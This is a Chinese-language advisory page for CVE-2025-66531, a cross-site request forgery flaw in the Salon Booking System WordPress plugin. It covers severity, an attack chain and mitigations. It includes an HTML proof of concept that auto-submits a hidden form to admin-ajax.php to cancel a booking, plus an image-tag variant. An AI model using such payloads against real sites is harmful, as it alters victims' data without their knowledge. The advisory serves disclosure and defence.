CVE-2025-66531 CVSS 4.3 中危

CVE-2025-66531 Salon booking system跨站请求伪造漏洞

披露日期: 2025-12-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-66531

漏洞类型

CSRF

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Salon booking system (WordPress插件)

漏洞概述

CVE-2025-66531是Dimitri Grassi开发的WordPress插件Salon Booking System中的一个跨站请求伪造（CSRF）漏洞。该漏洞存在于10.30.3及之前的所有版本中，攻击者可以利用此漏洞诱导已登录的管理员或用户执行非预期的操作。由于Salon Booking System是一个广泛应用于美发沙龙和美容院的预约管理插件，漏洞可能导致未经授权的预约修改、取消或数据篡改。CSRF攻击利用的是Web应用程序对用户身份验证的信任，攻击者通过构造恶意请求并诱骗受害者在已登录状态下访问，从而在用户不知情的情况下执行敏感操作。此漏洞的CVSS评分为4.3，属于中等严重程度，主要影响需要用户交互才能触发的特性。

技术细节

Salon Booking System插件在处理关键业务操作时未实施充分的CSRF令牌验证机制。攻击者可以通过构造包含恶意参数的HTML页面或链接，当具有管理员权限的用户访问时，浏览器会自动携带有效的Cookie向目标站点发送请求。插件接收到请求后，由于缺少有效的CSRF token验证，无法区分请求的来源是否为合法的内部操作。攻击者可以利用此漏洞执行预约状态修改、服务配置变更、用户权限操作等敏感功能。漏洞影响所有使用该插件进行预约管理的WordPress站点，攻击者无需认证即可发起CSRF攻击，但需要诱导目标用户在登录状态下访问恶意内容。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标站点使用的Salon Booking System插件版本，确认版本 <= 10.30.3

STEP 2

步骤2: 构造恶意请求

攻击者分析插件的AJAX端点和参数，构造包含敏感操作的CSRF payload

STEP 3

步骤3: 社工诱导

攻击者通过钓鱼邮件、恶意链接或嵌入第三方网站的iframe诱导目标管理员访问

STEP 4

步骤4: 请求执行

目标管理员在登录状态下访问恶意页面，浏览器自动发送携带有效Cookie的请求

STEP 5

步骤5: 操作完成

插件接收到请求后因缺少CSRF验证而执行攻击者指定的操作，如修改预约状态

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for Salon Booking System - Modify Booking Status -->
<!DOCTYPE html>
<html>
<head>
    <title>CSRF Attack PoC</title>
</head>
<body>
    <h1>Malicious Page - Do Not Visit</h1>
    <form action="https://target-site.com/wp-admin/admin-ajax.php" method="POST" id="csrfForm">
        <input type="hidden" name="action" value="salon_update_booking">
        <input type="hidden" name="booking_id" value="123">
        <input type="hidden" name="status" value="cancelled">
        <input type="hidden" name="_wpnonce" value="">
    </form>
    
    <script>
        // Auto-submit form without user interaction
        document.getElementById('csrfForm').submit();
    </script>
    
    <p>If you see this, the attack failed.</p>
</body>
</html>

<!-- Alternative: Image tag-based GET request (if supported) -->
<img src="https://target-site.com/wp-admin/admin-ajax.php?action=salon_update_booking&booking_id=123&status=cancelled" width="0" height="0">

影响范围

Salon Booking System <= 10.30.3

防御指南

临时缓解措施

在官方修复版本发布前，可采取以下临时措施：1) 启用WordPress的CSRF保护插件；2) 限制管理员账户的使用，避免在不受信任的网络环境下访问后台；3) 定期审查预约记录和系统日志，及时发现异常操作；4) 考虑暂时禁用Salon Booking System插件的非必要功能；5) 对管理员进行安全意识培训，提醒不要点击来路不明的链接。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表